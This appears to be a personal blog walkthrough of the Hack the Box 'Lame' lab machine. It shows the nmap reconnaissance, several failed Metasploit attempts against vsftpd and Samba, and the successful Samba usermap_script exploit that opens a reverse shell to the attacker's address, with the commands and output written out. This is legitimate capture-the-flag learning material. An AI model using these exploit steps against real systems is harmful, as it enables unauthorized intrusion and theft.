My 2021 New Year resolution was to take a shot at learning some penetration testing techniques.
In cybersecurity OSINT plays a big part – especially in pentesting.
But at the same time it is also significantly different to the OSINT that focuses on persons, companies, emails, websites and the general digital footprint.
In pentesting, OSINT can mean anything from passive reconnaissance of the target infrastructure, searching for CVEs, literature research (in absolutely any meaning of the word), to lurking on discussion forums or even reaching out to experts for advice.
That is why I recently signed up to Hack the Box – to do all that; and through it, to learn a ton of new stuff.
So here is my first training machine I managed to hack into.
The name very aptly describes my current pentesting skills – but from here I can only get better.
This walkthrough was conducted using a Linux Parrot virtual machine.
I began with an nmap scan of the machine’s IP address (which is not static, it changes with every instance):
sudo nmap -T4 -A -v -p- 10.129.71.202 -T4 - the scan speed template, ranging from 0 (slow & stealthy) to 5 (fast & obvious) -A - operating system and version check -v - verbose output -p- - scan all 65535 ports on the IP address
Scan result summary
The following 5 ports and services were identified:
21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
vsftpd is a default FTP (File Transfer Protocol) server for a number of Linux distributions and it’s used for storing and sharing files.
Very clearly this is an obsolete version of the service that is highly unlikely to be detected anymore in real life.
In 2011 there were reports of an exploit detected on an archived version of vsftpd 2.3.4 that enabled a malicious backdoor execution.
It is worth noting that (as per the screenshot above) it is possible to connect anonymously to the FTP service.
I started with launching Metasploit Framework in order to find out more about the exploit instead of relying on online sources:
msfconsole msf6 > search vsftpd
To make use of this exploit, select it from the list (here we only have 1 option marked with a zero):
I got the message about no payload configured, but then the command defaults to cmd/unix/interact.
You can display available options by adding the “> show options”
exploit(unix/ftp/vsftpd_234_backdoor) > show options
I set the host to the machine’s IP address:
set RHOST 10.129.71.202
Unfortunately, these efforts were met with a message: “Exploit completed, but no session was created”.
I went back to the command line, in order to see if connecting directly to the IP address would work…
msf6 > exit ftp 10.129.71.202
When prompted here I tried a number of generic user names (user, admin, test, 123, etc.).
I took me a while until I tried “anonymous” (yes, the hint is in the initial scan result).
When prompted for password, I just hit ENTER.
Admittedly, I had no idea what to do next. I found a list of Linux FTP commands from here and tried them all one after the other.
NOTE: At this point I took a long break and forgot to extend the uptime on the Lame machine.
This resulted in reseting the IP address, so I relaunched the machine on a new IP – 10.129.89.92.
OpenSSH (Secure Shell) is an encrypted, remote access service.
Version 4.7p1 has some known vulnerabilities listed here.
Searching Metasploit again revealed some exploits for Windows OS, clearly of no use here.
Samba smbd 3.X – 4.X
Samba is a service that provides file and printer sharing options across various operating systems.
Metasploit lists 19 different vulnerabilities for the Samba 3 version. Not all of these apply as some relate to Windows and Unix systems.
I could have tried the relevant exploits one by one, but the better idea is to start with those ranked the highest (excellent).
6 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Samba is_known_pipename() Arbitrary Module Load
The above exploit however seems to require valid credentials, which I did not have. So I tried another:
9 exploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86) msf6 exploit > use 9 [*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp msf6 exploit(linux/samba/trans2open) > set RHOSTS 10.129.89.92 RHOSTS => 10.129.89.92 msf6 exploit(linux/samba/trans2open) > run [*] Started reverse TCP handler on 10.0.2.15:4444 [*] 10.129.89.92:139 - Trying return address 0xbffffdfc... [-] 10.129.89.92:139 - Exploit aborted due to failure: no-target: This target is not a vulnerable Samba server (Samba 3.0.20-Debian) [*]Exploit completed, but no session was created.
I unsuccessfully tried a number of times, including the next exploit on the list:
11 exploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Execution msf6 > use 11 [*] No payload configured, defaulting to cmd/unix/reverse_netcat msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.129.89.92 RHOSTS => 10.129.89.92 msf6 exploit(multi/samba/usermap_script) > run [*] Started reverse TCP handler on 10.0.2.15:4444 [*] Exploit completed, but no session was created.
It took me a while to understand what I was doing wrong here.
msf6 exploit(multi/samba/usermap_script) > options
The key was to understand that both the RHOSTS and LHOST IP addresses must be set correctly:
In my case this was not configured by default.
Luckily, the ifconfig command lets you check the tun0 address.
Then simply set LHOST to that IP:
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.101
Once everything is set, time to put the exploit to a test:
msf6 exploit(multi/samba/usermap_script) > run [*] Started reverse TCP handler on 10.10.14.101:4444 [*] Command shell session 1 opened (10.10.14.101:4444 -> 10.129.89.92:56128) at 2021-01-31 15:20:45 -0500
Listing directories with the dir command showed the presence of home and root directories.
I navigated wit the cd, ls / dir commands between home and root, then searched for text files and used the cat command to grab hash values:
Don’t forget to return both user and root flags and claim ownership of Lame!